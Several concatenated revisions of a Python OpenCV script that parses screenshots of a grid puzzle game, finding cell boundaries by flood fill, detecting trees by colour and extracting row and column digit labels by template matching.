    # (TODO: for simplicity, let's only consider color of unsat digits for now)
    # - cv2.inRange to extract shape of the digit
    # - cv2.boundingRect to find the bounding rectangle
    # - crop it and save it as image.
    # - for sat digits, the checkmark needs to be extracted,
    #   but that's not an immediate issue as most of the digits are indeed unsat.
    # - note that a digit cell can contain multiple digits,
    #   we could get only a partial digit, but that doesn't really affect
    #   the correctness of matchTemplate.
    show = True
    if show:
        pyplot.figure().canvas.set_window_title('@dev')
        subplot_color(221, img, 'origin')
        subplot_color(222, recombined, 'extracted')
        subplot_gray(223, digits, 'digits')
        subplot_gray(224, cell_results_recombined, 'find tree')
        pyplot.show()
def main_tagging():
    """Work-in-progress digit-tagging loop (currently only loads samples)."""
    # TODO:
    # the idea of this function is to turn this program into an iterative loop to
    # gradually tag sample images with digits, recognized from board of various sizes.
    store_path = '../private/digits'
    if not os.path.exists(store_path):
        os.makedirs(store_path)
    # limit the # of samples stored to disk per execution.
    store_quota = 12
    for size in range(6,22+1):
        if store_quota <= 0:
            break
        img = load_sample(size)
        h, w, _ = img.shape
# Script entry point: run the current experiment by default.
if __name__ == '__main__':
    main_experiment()
    # main_tagging()
move more stuff to top level.
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
import os
tm_method = cv2.TM_CCOEFF_NORMED
color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
color_sat = (0x97, 0xa7, 0xc8)
color_shade = (0x55, 0xc8, 0x87)
def load_sample(size):
    """Load the screenshot sample image for a size x size board."""
    return cv2.imread(f'../private/sample-{size}x{size}.png')
def find_and_mark_matches(img, result, pat_dims, threshold):
    """Find and mark matching places given a result of matchTemplate.

    Draws a rectangle on a copy of img at every position whose match
    score exceeds threshold; prints each hit. img is left untouched.
    """
    img_marked = img.copy()
    h, w = result.shape
    pat_h, pat_w = pat_dims
    for r in range(h):
        for c in range(w):
            if (result[r,c] > threshold):
                print(r,c, result[r,c])
                top_left = (c,r)
                bottom_right = (c + pat_w, r + pat_h)
                cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
    return img_marked
def scale_pattern(pat_orig, target_width):
    """Scale pat_orig so its width becomes target_width, preserving aspect.

    Bug fix: cv2.resize's third positional argument is `dst`, not the
    interpolation flag, so the original call handed INTER_AREA to `dst`
    and the interpolation mode silently stayed at the default. Pass it
    by keyword instead.
    """
    pat_orig_h, pat_orig_w = pat_orig.shape[0], pat_orig.shape[1]
    scale = target_width / pat_orig_w
    pat_h = round(pat_orig_h * scale)
    pat_w = round(pat_orig_w * scale)
    return cv2.resize(pat_orig, (pat_w, pat_h), interpolation=cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
    """Search for the pattern width whose scaled template best matches img.

    Coarse-to-fine search: start from a coarse grid of candidate widths,
    keep roughly the top 10% each round, then expand around the survivors
    with half the step until the step reaches zero.

    Fixes: removed the dead `pat_w, pat_h, _ = pat.shape` unpack (it also
    had width/height swapped — ndarray shape is (h, w, channels)) and the
    unused minMaxLoc outputs.

    Returns the best width found (int).
    """
    eval_count = 0

    @functools.lru_cache()
    def evaluate_width(width):
        # Score a width by the best matchTemplate response it yields.
        nonlocal eval_count
        pat = scale_pattern(pat_orig, width)
        result = cv2.matchTemplate(img, pat, tm_method)
        _, max_val, _, _ = cv2.minMaxLoc(result)
        eval_count += 1
        return max_val

    # search within this range, with decreasing steps per iteration until
    # we reach a local maxima
    min_width, max_width = 30, 220
    step = 16
    candidates = set(range(min_width, max_width, step))
    while True:
        sorted_candidates = sorted(candidates, key=evaluate_width, reverse=True)
        # Only top few candidates survive.
        keep = max(1, math.floor(len(sorted_candidates) * 0.1))
        candidates = sorted_candidates[:keep]
        step //= 2
        if not step:
            break
        # candidate expansion for next iteration.
        candidates = {
            y
            for x in candidates
            for y in [x - step, x, x + step]
            if min_width <= y <= max_width
        }
    # note that at this point candidates is a best-first sorted list
    best_target_width = candidates[0]
    print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
    return best_target_width
def resample_pattern_from_image(pat_orig, img):
    """Re-extract the best-matching region of img as a fresh pattern.

    Optimizes the pattern width first, then crops img at the location
    of the strongest template match.
    """
    best_target_width = optimize_pattern_width(pat_orig, img)
    pat = scale_pattern(pat_orig, best_target_width)
    pat_h, pat_w, _ = pat.shape
    result = cv2.matchTemplate(img,pat,tm_method)
    _, _, _, max_loc = cv2.minMaxLoc(result)
    # minMaxLoc locations are (x, y) == (col, row)
    c, r = max_loc
    return img[r:r+pat_h,c:c+pat_w]
def subplot_gray(num, img, title):
    """Show img as grayscale in subplot `num` with title, no axis ticks."""
    pyplot.subplot(num), pyplot.imshow(img,cmap = 'gray')
    pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def subplot_color(num, img, title):
    """Show a BGR img in subplot `num` by reordering channels to RGB."""
    pyplot.subplot(num), pyplot.imshow(img[:,:,[2,1,0]])
    pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def main_all_samples():
    """Print the optimized pattern width for every sample board size."""
    pat_orig = cv2.imread('../sample/tree-sample.png')
    for i in range(5,22+1):
        img = load_sample(i)
        target_width = optimize_pattern_width(pat_orig, img)
        print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold=3):
    """Collapse noisy coordinate counts into `size` representative values.

    Keys of d are coordinates, values are occurrence counts. Keys are
    visited in ascending order; a key within `threshold` of the first
    key of the open group joins it, otherwise a new group starts. Each
    group reduces to the weighted average of its keys. Returns an
    iterator of `size` averages (asserts exactly `size` groups formed).
    """
    groups = []  # each group: list of (key, count) pairs
    group_start = None  # first key of the open group
    for pair in sorted(d.items()):
        key = pair[0]
        if group_start is not None and key - group_start < threshold:
            groups[-1].append(pair)
        else:
            groups.append([pair])
            group_start = key
    # TODO: given sufficient info we might be able to
    # "fill in the blank" if there are missing elements,
    # but for now it seems good enough to not worry about
    # this issue.
    assert len(groups) == size

    # weighted average of one group's keys, weighted by their counts
    def ave(pairs):
        numer = sum(k * v for k, v in pairs)
        denom = sum(v for _, v in pairs)
        return numer / denom

    return map(ave, groups)
def rescale_and_match(img, templ_in, tm_method):
    """Rescale templ_in to the content width of img and return the best
    matchTemplate score, or None when matching is impossible.

    Bug fix: cv2.resize's third positional argument is `dst`, not the
    interpolation flag — INTER_AREA must be passed by keyword. Also
    removed the unused `scale` local.
    """
    (_, _, w, h) = cv2.boundingRect(img)
    if w == 0 or h == 0:
        # blank image: nothing to match against
        return None
    # try to rescale pattern to match image width (of the bounding rect)
    # we are targeting width here because we can prevent one digit pattern
    # to match with multiple digit ones this way.
    # also because digits tend to vary more in horizontal direction
    # so we are actually eliminating lots of candidates this way.
    templ_in_h, templ_in_w = templ_in.shape
    templ_h = round(templ_in_h * w / templ_in_w)
    if templ_h > h:
        # scaled template would be taller than the content; cannot fit
        return None
    templ = cv2.resize(templ_in, (w, templ_h), interpolation=cv2.INTER_AREA)
    result = cv2.matchTemplate(img, templ, tm_method)
    _, max_val, _, _ = cv2.minMaxLoc(result)
    return max_val
def find_cell_bounds(img, size):
    """Locate the pixel bounds of the size x size board cells.

    Flood-fills every region matching the blank-cell color, collects the
    begin/end coordinates of each filled rectangle into histograms, and
    reduces those noisy histograms to exactly `size` row bounds and
    `size` column bounds via resolve_stat.

    Returns (row_bounds, col_bounds), each a list of (begin, end)
    inclusive pixel coordinates.
    """
    h, w, _ = img.shape
    # This is the exact color that game uses for blank cells.
    bk = (49, 49, 52)
    result = cv2.inRange(img, bk, bk)
    mk_stat = lambda: collections.defaultdict(lambda: 0)
    row_begins_stat = mk_stat()
    row_ends_stat = mk_stat()
    col_begins_stat = mk_stat()
    col_ends_stat = mk_stat()
    # floodFill's mask must be 2 pixels larger than the image in each dim.
    mask = np.zeros((h+2,w+2), dtype=np.uint8)
    # skip first region encountered, which is likely just the difficulty box
    # on the top right corner.
    first_skipped = False
    for r in range(h):
        for c in range(w):
            if (result[r,c] != 0):
                x,y = c,r
                # Erase the region as it is counted so each cell fills once.
                retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
                rect_x, rect_y, rect_w, rect_h = rect
                if not first_skipped:
                    first_skipped = True
                    continue
                row_begins_stat[rect_y] += 1
                col_begins_stat[rect_x] += 1
                rect_x_end = rect_x + rect_w - 1
                rect_y_end = rect_y + rect_h - 1
                row_ends_stat[rect_y_end] += 1
                col_ends_stat[rect_x_end] += 1
    def make_bounds(begin_stat, end_stat):
        # Pair up the `size` averaged begin coords with the end coords.
        begin_coords = map(round, resolve_stat(begin_stat, size))
        end_coords = map(round, resolve_stat(end_stat, size))
        return list(map(lambda x,y: (x,y), begin_coords, end_coords))
    row_bounds = make_bounds(row_begins_stat, row_ends_stat)
    col_bounds = make_bounds(col_begins_stat, col_ends_stat)
    return row_bounds, col_bounds
def extract_digits(img, cell_bounds):
    """Cut out the digit patches that accompany each row and column.

    cell_bounds is (row_bounds, col_bounds) as returned by
    find_cell_bounds: lists of (begin, end) inclusive coordinates.
    The digit strip sits one cell-stride before the first cell, found
    by extrapolating the first two cell origins: A - (B - A) = 2A - B.

    Fix: removed the dead `h, w, _ = img.shape` unpack.

    Returns (row_digits, col_digits): lists of square image patches,
    one per row bound / column bound.
    """
    row_bounds, col_bounds = cell_bounds
    # Largest cell side seen among all row/col bounds.
    max_cell_side = max(hi - lo + 1 for lo, hi in row_bounds + col_bounds)

    def extract_digit(row, col):
        # A square patch of (max_cell_side - 1) pixels at (row, col).
        return img[row:row + max_cell_side - 1, col:col + max_cell_side - 1]

    # Extrapolate one cell-stride before the first cell: 2A - B.
    digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
    digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
    # digits accompanying every row.
    row_digits = [
        extract_digit(row_lo, digit_col_start)
        for row_lo, _ in row_bounds
    ]
    # same but for columns
    col_digits = [
        extract_digit(digit_row_start, col_lo)
        for col_lo, _ in col_bounds
    ]
    return row_digits, col_digits
def crop_digit_cell(img):
    """Mask img to the unsat-digit color and crop to its bounding box.

    Returns the cropped binary mask, or None when the color is absent.
    """
    mask = cv2.inRange(img, color_unsat, color_unsat)
    x, y, w, h = cv2.boundingRect(mask)
    if w and h:
        return mask[y:y + h, x:x + w]
    return None
def main_experiment():
    """Experimental pipeline on the 22x22 sample: locate cells, detect
    trees per cell, extract digit strips, and show a 2x2 figure."""
    size = 22
    img = load_sample(size)
    h, w, _ = img.shape
    cell_bounds = find_cell_bounds(img, size)
    row_bounds, col_bounds = cell_bounds
    cells = [ [ None for _ in range(size) ] for _ in range(size)]
    for r, (row_lo, row_hi) in enumerate(row_bounds):
        for c, (col_lo, col_hi) in enumerate(col_bounds):
            cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
    def find_tree(cell_img):
        # A cell contains a tree iff the tree shade color appears in it;
        # render the verdict as a small 4x4 white/black tile.
        result = cv2.inRange(cell_img, color_shade, color_shade)
        (_,_,w,h) = cv2.boundingRect(result)
        if w != 0 and h != 0:
            color = 0xFF
        else:
            color = 0
        return np.full((4,4), color)
    recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
    cell_results_recombined = np.concatenate([
        np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
    ], axis=0)
    max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
    side_length_for_display = math.ceil(max_cell_side * 1.1)
    def padding_digit_img(dg_img):
        # Center dg_img on a gray square tile for uniform display.
        if dg_img is None:
            return np.full((side_length_for_display, side_length_for_display), 0x7F)
        h, w = dg_img.shape
        top = math.floor((side_length_for_display - h) / 2)
        bottom = side_length_for_display - top - h
        left = math.floor((side_length_for_display - w) / 2)
        right = side_length_for_display - left - w
        return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
    # TODO: make a matrix of matching results of matchTemplate for row / col digits.
    # where the template is digits cropped by bounding rect,
    # and image is the digit picture after inRange filter.
    # TODO: scaling is for now ignored but we'll do something about it
    # plan: run boundingRect on digit image, and use height of resulting
    # rectangle to scale the template into same height before matchTemplate run.
    # digits accompanying every row and col.
    row_digits, col_digits = extract_digits(img, cell_bounds)
    row_digit_templs = [ crop_digit_cell(d) for d in row_digits ]
    col_digit_templs = [ crop_digit_cell(d) for d in col_digits ]
    def debug_cross_compare(digits, digit_templs):
        # Print a score matrix of every digit image against every template.
        for dg_img_pre in digits:
            dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
            line = []
            for templ in digit_templs:
                if templ is None:
                    line.append('------')
                    continue
                max_val = rescale_and_match(dg_img,templ,tm_method)
                if max_val is None:
                    line.append('------')
                    continue
                line.append(f'{max_val:.4f}')
            print(', '.join(line))
    print('Mat for row digits:')
    debug_cross_compare(row_digits, row_digit_templs)
    print('Mat for col digits:')
    debug_cross_compare(col_digits, col_digit_templs)
    digits = np.concatenate(
        [
            np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
            np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
        ])
    # digit sample extraction steps (for each single cell image)
    # (TODO: for simplicity, let's only consider color of unsat digits for now)
    # - cv2.inRange to extract shape of the digit
    # - cv2.boundingRect to find the bounding rectangle
    # - crop it and save it as image.
    # - for sat digits, the checkmark needs to be extracted,
    #   but that's not an immediate issue as most of the digits are indeed unsat.
    # - note that a digit cell can contain multiple digits,
    #   we could get only a partial digit, but that doesn't really affect
    #   the correctness of matchTemplate.
    show = True
    if show:
        pyplot.figure().canvas.set_window_title('@dev')
        subplot_color(221, img, 'origin')
        subplot_color(222, recombined, 'extracted')
        subplot_gray(223, digits, 'digits')
        subplot_gray(224, cell_results_recombined, 'find tree')
        pyplot.show()
def main_tagging():
    """Iteratively tag digit samples recognized from boards of various sizes.

    Work in progress (TODO in original): currently only loads each sample
    and finds its cell bounds; nothing is written to disk yet and the
    quota is never consumed.
    """
    store_path = '../private/digits'
    if not os.path.exists(store_path):
        os.makedirs(store_path)
    # limit the # of samples stored to disk per execution.
    remaining_quota = 12
    for size in range(6, 22 + 1):
        if remaining_quota <= 0:
            break
        print(f'Processing image sample of size {size} ...')
        img = load_sample(size)
        h, w, _ = img.shape
        cell_bounds = find_cell_bounds(img, size)
# Entry point: the experiment flow is active; the tagging flow is still WIP.
if __name__ == '__main__':
    main_experiment()
    # main_tagging()
|
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
tm_method = cv2.TM_CCOEFF_NORMED
def load_sample(size):
    """Load the private board screenshot for a size x size puzzle (BGR)."""
    sample_path = f'../private/sample-{size}x{size}.png'
    return cv2.imread(sample_path)
def find_and_mark_matches(img, result, pat_dims, threshold):
    """Find and mark matching places given a result of matchTemplate.

    img: source image; a marked copy is returned (input left untouched).
    result: score map produced by cv2.matchTemplate on img.
    pat_dims: (pattern_height, pattern_width) of the template.
    threshold: scores strictly above this count as matches.
    """
    img_marked = img.copy()
    pat_h, pat_w = pat_dims
    # np.argwhere walks the score map in row-major order - the same order
    # as the original nested Python loops - but the comparison over the
    # whole map runs vectorized in C instead of one pixel at a time.
    for r, c in np.argwhere(result > threshold):
        print(r, c, result[r, c])  # debug trace of every accepted match
        top_left = (c, r)
        bottom_right = (c + pat_w, r + pat_h)
        cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
    return img_marked
def scale_pattern(pat_orig, target_width):
    """Resize pattern to target_width, preserving its aspect ratio.

    Works for both grayscale and color patterns.
    """
    pat_orig_h, pat_orig_w = pat_orig.shape[:2]  # robust to gray or color input
    scale = target_width / pat_orig_w
    pat_h = round(pat_orig_h * scale)
    pat_w = round(pat_orig_w * scale)
    # BUG FIX: the third positional parameter of cv2.resize is `dst`, not
    # the interpolation flag, so the original call never applied INTER_AREA.
    # Pass it by keyword so it actually takes effect.
    return cv2.resize(pat_orig, (pat_w, pat_h), interpolation=cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
    """Search for the template width whose best match score in img is highest.

    Coarse-to-fine search: evaluate a set of candidate widths, keep the top
    ~10%, halve the step, expand around survivors, and repeat until the
    step reaches zero.  Returns the best width found.
    """
    eval_count = 0

    @functools.lru_cache()
    def evaluate_width(width):
        # Score one candidate width by its best template-match response.
        nonlocal eval_count
        pat = scale_pattern(pat_orig, width)
        result = cv2.matchTemplate(img, pat, tm_method)
        _, max_val, _, _ = cv2.minMaxLoc(result)
        eval_count += 1
        return max_val

    # search within this range, with decreasing steps per iteration until
    # we reach a local maxima
    min_width, max_width = 30, 220
    step = 16
    candidates = set(range(min_width, max_width, step))
    while True:
        sorted_candidates = sorted(candidates, key=evaluate_width, reverse=True)
        # Only top few candidates survive.
        keep = max(1, math.floor(len(sorted_candidates) * 0.1))
        candidates = sorted_candidates[:keep]
        step //= 2
        if not step:
            break
        # candidate expansion for next iteration.
        candidates = {
            y
            for x in candidates
            for y in [x - step, x, x + step]
            if min_width <= y <= max_width
        }
    # On loop exit `candidates` is still the sorted, trimmed list, so the
    # best width sits at the front.  (Removed the original's unused
    # `pat_w, pat_h, _ = pat.shape` unpack, whose names were also swapped
    # relative to numpy's (height, width, channels) order.)
    best_target_width = candidates[0]
    print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
    return best_target_width
def resample_pattern_from_image(pat_orig, img):
    """Re-extract the pattern from img at its best-matching scale and spot.

    Optimizes the template width first, then crops the region of img where
    the rescaled template matches best.
    """
    width = optimize_pattern_width(pat_orig, img)
    pat = scale_pattern(pat_orig, width)
    pat_h, pat_w, _ = pat.shape
    scores = cv2.matchTemplate(img, pat, tm_method)
    _, _, _, best_loc = cv2.minMaxLoc(scores)
    col, row = best_loc
    return img[row:row + pat_h, col:col + pat_w]
def main_scale_pattern_and_match():
    """Match the tree template against the 18x18 sample and visualize scores."""
    img = load_sample(18)
    pat_orig = cv2.imread('../sample/tree-sample.png')
    pat = resample_pattern_from_image(pat_orig, img)
    pat_h, pat_w, _ = pat.shape
    print(pat.shape)
    result = cv2.matchTemplate(img, pat, tm_method)
    # BUG FIX: cv2.normalize's second positional parameter is `dst`; the
    # original cv2.normalize(result, 0, 255) never passed the 0..255 range
    # as alpha/beta.  Spell the arguments out for a min-max stretch.
    result_norm = cv2.normalize(result, None, 0, 255, cv2.NORM_MINMAX)
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
    # now the problem lies in how should we find this threshold.
    # it is promising here to analyze histogram to determine this value.
    img_marked = find_and_mark_matches(img, result, [pat_h, pat_w], 0.95)
    print(f'min: {min_val}, max: {max_val}')
    top_left = max_loc
    bottom_right = (top_left[0] + pat_w, top_left[1] + pat_h)
    pyplot.figure().canvas.set_window_title('@dev')
    pyplot.subplot(131), pyplot.imshow(result_norm, cmap='gray')
    pyplot.title('result'), pyplot.xticks([]), pyplot.yticks([])
    # opencv stores in BGR while pyplot in RGB. (https://stackoverflow.com/a/41869419/315302)
    pyplot.subplot(132), pyplot.imshow(img_marked[:, :, [2, 1, 0]])
    pyplot.title('origin'), pyplot.xticks([]), pyplot.yticks([])
    pyplot.subplot(133), pyplot.hist(result.flatten(), range=(0.9, 1.0))
    pyplot.title('hist')
    pyplot.show()
def subplot_gray(num, img, title):
    """Render a grayscale image into subplot `num` with axis ticks hidden."""
    pyplot.subplot(num)
    pyplot.imshow(img, cmap='gray')
    pyplot.title(title)
    pyplot.xticks([])
    pyplot.yticks([])
def subplot_color(num, img, title):
    """Render a BGR image into subplot `num` (channel-swapped to RGB)."""
    pyplot.subplot(num)
    pyplot.imshow(img[:, :, [2, 1, 0]])  # OpenCV is BGR, pyplot expects RGB
    pyplot.title(title)
    pyplot.xticks([])
    pyplot.yticks([])
def main_all_samples():
    """Report the optimized template width for every available sample size."""
    pat_orig = cv2.imread('../sample/tree-sample.png')
    for i in range(5, 22 + 1):
        sample = load_sample(i)
        target_width = optimize_pattern_width(pat_orig, sample)
        print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold = 3):
    """Collapse noisy coordinate counts into `size` representative values.

    d maps a coordinate to how often it was observed.  Coordinates closer
    than `threshold` to the first coordinate of the current group are
    merged into it; each group is then reduced to its count-weighted
    average coordinate.

    Returns a list of `size` averages in ascending coordinate order.
    Raises AssertionError if the number of groups differs from `size`.
    """
    hold = None  # open group: (first key of the group, {key: count})
    grouping = []
    for k, v in sorted(d.items()):
        if hold is None:
            hold = (k, {k: v})
        else:
            kh, sd = hold
            if k - kh < threshold:
                # Close to the group's first key: merge into current group.
                sd[k] = v
            else:
                grouping.append(sd)
                hold = (k, {k: v})
    if hold is not None:
        grouping.append(hold[1])
    # TODO: given sufficient info we might be able to
    # "fill in the blank" if there are missing elements,
    # but for now it seems good enough to not worry about
    # this issue.
    assert len(grouping) == size

    def ave(sub_dict):
        # Count-weighted average of the group's coordinates.
        numer = sum(k * v for k, v in sub_dict.items())
        denom = sum(sub_dict.values())
        return numer / denom

    # Return a concrete, reusable list instead of the original's one-shot
    # map object (backward compatible: callers only iterate the result).
    # Also dropped the dead `hold = None` reset that followed the append.
    return [ave(g) for g in grouping]
def main_find_blanks():
    """Detect the puzzle grid in a sample screenshot by flood-filling blank
    cells, derive row/column bounds, slice out cells and digit labels, then
    display debug views.

    NOTE(review): driven by exact in-game colors and private sample images;
    this is experimental/debug code.
    """
    size = 22
    img = load_sample(size)
    h, w, _ = img.shape
    # This is the exact color that game uses for blank cells.
    bk = (49, 49, 52)
    result = cv2.inRange(img, bk, bk)
    # Per-axis histograms: coordinate -> how many blank regions begin/end there.
    mk_stat = lambda: collections.defaultdict(lambda: 0)
    row_begins_stat = mk_stat()
    row_ends_stat = mk_stat()
    col_begins_stat = mk_stat()
    col_ends_stat = mk_stat()
    # floodFill requires a mask 2 pixels larger than the image.
    mask = np.zeros((h+2,w+2), dtype=np.uint8)
    # skip first region encountered, which is likely just the difficulty box
    # on the top right corner.
    first_skipped = False
    for r in range(h):
        for c in range(w):
            if (result[r,c] != 0):
                x,y = c,r
                # Erase this connected blank region in-place and record its
                # bounding rectangle.
                retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
                rect_x, rect_y, rect_w, rect_h = rect
                if not first_skipped:
                    first_skipped = True
                    continue
                row_begins_stat[rect_y] += 1
                col_begins_stat[rect_x] += 1
                rect_x_end = rect_x + rect_w - 1
                rect_y_end = rect_y + rect_h - 1
                row_ends_stat[rect_y_end] += 1
                col_ends_stat[rect_x_end] += 1
    def make_bounds(begin_stat, end_stat):
        # Collapse noisy begin/end histograms into `size` (lo, hi) pairs.
        begin_coords = map(round, resolve_stat(begin_stat, size))
        end_coords = map(round, resolve_stat(end_stat, size))
        return list(map(lambda x,y: (x,y), begin_coords, end_coords))
    row_bounds = make_bounds(row_begins_stat, row_ends_stat)
    col_bounds = make_bounds(col_begins_stat, col_ends_stat)
    # Slice the board into size x size cell images (bounds are inclusive).
    cells = [ [ None for _ in range(size) ] for _ in range(size)]
    for r, (row_lo, row_hi) in enumerate(row_bounds):
        for c, (col_lo, col_hi) in enumerate(col_bounds):
            cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
    def find_tree(cell_img):
        # A cell contains a tree iff the exact tree shade color is present.
        # Returns a 4x4 tile (white = tree, black = none) for the debug view.
        color_shade = (0x55, 0xc8, 0x87)
        result = cv2.inRange(cell_img, color_shade, color_shade)
        (_,_,w,h) = cv2.boundingRect(result)
        if w != 0 and h != 0:
            color = 0xFF
        else:
            color = 0
        return np.full((4,4), color)
    recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
    cell_results_recombined = np.concatenate([
        np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
    ], axis=0)
    max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
    def extract_digit(row,col):
        # Crop a digit-label area the size of the largest cell.
        return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
    # Suppose first two cells are A and B, we can then find a cell C if we extend
    # difference between A and B but in the other direction.
    # A - (B - A) = 2A - B
    digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
    digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
    color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
    color_sat = (0x97, 0xa7, 0xc8)
    side_length_for_display = math.ceil(max_cell_side * 1.1)
    def process_digit_cell(dg_img):
        # Extract the digit shape and crop it to its bounding box; None when
        # the cell has no unsat-colored pixels.
        result = cv2.inRange(dg_img, color_unsat, color_unsat)
        (x,y,w,h) = cv2.boundingRect(result)
        if w == 0 or h == 0:
            return None
        return result[y:y+h,x:x+w]
    def padding_digit_img(dg_img):
        # Center the cropped digit on a fixed-size gray canvas for display.
        if dg_img is None:
            return np.full((side_length_for_display, side_length_for_display), 0x7F)
        h, w = dg_img.shape
        top = math.floor((side_length_for_display - h) / 2)
        bottom = side_length_for_display - top - h
        left = math.floor((side_length_for_display - w) / 2)
        right = side_length_for_display - left - w
        return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
    # TODO: make a matrix of matching results of matchTemplate for row / col digits.
    # where the template is digits cropped by bounding rect,
    # and image is the digit picture after inRange filter.
    # TODO: scaling is for now ignored but we'll do something about it
    # plan: run boundingRect on digit image, and use height of resulting
    # rectangle to scale the template into same height before matchTemplate run.
    # digits accompanying every column.
    col_digits = [
        extract_digit(digit_row_start,col_lo)
        for col_lo, _ in col_bounds
    ]
    col_digit_templs = [ process_digit_cell(d) for d in col_digits ]
    # same but for rows
    row_digits = [
        extract_digit(row_lo,digit_col_start)
        for row_lo, _ in row_bounds
    ]
    row_digit_templs = [ process_digit_cell(d) for d in row_digits ]
    def debug_cross_compare(digits, digit_templs):
        # Print a score matrix: each digit image matched against every template.
        # NOTE(review): matchTemplate raises if a template is larger than the
        # image; the later revision of this file guards against that - confirm
        # it cannot happen here.
        for dg_img_pre in digits:
            dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
            line = []
            for templ in digit_templs:
                if templ is None:
                    line.append('--------')
                    continue
                result = cv2.matchTemplate(dg_img,templ,cv2.TM_CCORR_NORMED)
                min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
                line.append(f'{max_val:.4f}')
            print(', '.join(line))
    debug_cross_compare(row_digits, row_digit_templs)
    debug_cross_compare(col_digits, col_digit_templs)
    # Montage of all padded digit templates: row digits above column digits.
    digits = np.concatenate(
        [
            np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
            np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
        ])
    # digit sample extraction steps (for each single cell image)
    # (TODO: for simplicity, let's only consider color of unsat digits for now)
    # - cv2.inRange to extract shape of the digit
    # - cv2.boundingRect to find the bounding rectangle
    # - crop it and save it as image.
    # - for sat digits, the checkmark needs to be extracted,
    #   but that's not an immediate issue as most of the digits are indeed unsat.
    # - note that a digit cell can contain multiple digits,
    #   we could get only a partial digit, but that doesn't really affect
    #   the correctness of matchTemplate.
    show = True
    if show:
        pyplot.figure().canvas.set_window_title('@dev')
        subplot_color(221, img, 'origin')
        subplot_color(222, recombined, 'extracted')
        subplot_gray(223, digits, 'digits')
        subplot_gray(224, cell_results_recombined, 'find tree')
        pyplot.show()
# Entry point: run the grid-extraction experiment by default.
if __name__ == '__main__':
    # main_scale_pattern_and_match()
    main_find_blanks()
Scale candidates and do elimination more aggressively.
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
tm_method = cv2.TM_CCOEFF_NORMED
def load_sample(size):
    """Load the private board screenshot for a size x size puzzle (BGR)."""
    sample_path = f'../private/sample-{size}x{size}.png'
    return cv2.imread(sample_path)
def find_and_mark_matches(img, result, pat_dims, threshold):
    """Find and mark matching places given a result of matchTemplate.

    Draws a rectangle on a copy of `img` for every score strictly above
    `threshold`, printing each accepted location, and returns the copy.
    """
    marked = img.copy()
    rows, cols = result.shape
    pat_h, pat_w = pat_dims
    for row in range(rows):
        for col in range(cols):
            score = result[row, col]
            if score <= threshold:
                continue
            print(row, col, score)
            corner_a = (col, row)
            corner_b = (col + pat_w, row + pat_h)
            cv2.rectangle(marked, corner_a, corner_b, 255, 2)
    return marked
def scale_pattern(pat_orig, target_width):
    """Resize pattern (gray or color) to target_width, keeping aspect ratio."""
    pat_orig_h, pat_orig_w = pat_orig.shape[0], pat_orig.shape[1]
    scale = target_width / pat_orig_w
    pat_h = round(pat_orig_h * scale)
    pat_w = round(pat_orig_w * scale)
    # BUG FIX: the third positional parameter of cv2.resize is `dst`, not
    # the interpolation flag, so the original call never applied INTER_AREA.
    # Pass it by keyword so it actually takes effect.
    return cv2.resize(pat_orig, (pat_w, pat_h), interpolation=cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
    """Search for the template width whose best match score in img is highest.

    Coarse-to-fine search: evaluate a set of candidate widths, keep the top
    ~10%, halve the step, expand around survivors, and repeat until the
    step reaches zero.  Returns the best width found.
    """
    eval_count = 0

    @functools.lru_cache()
    def evaluate_width(width):
        # Score one candidate width by its best template-match response.
        nonlocal eval_count
        pat = scale_pattern(pat_orig, width)
        result = cv2.matchTemplate(img, pat, tm_method)
        _, max_val, _, _ = cv2.minMaxLoc(result)
        eval_count += 1
        return max_val

    # search within this range, with decreasing steps per iteration until
    # we reach a local maxima
    min_width, max_width = 30, 220
    step = 16
    candidates = set(range(min_width, max_width, step))
    while True:
        sorted_candidates = sorted(candidates, key=evaluate_width, reverse=True)
        # Only top few candidates survive.
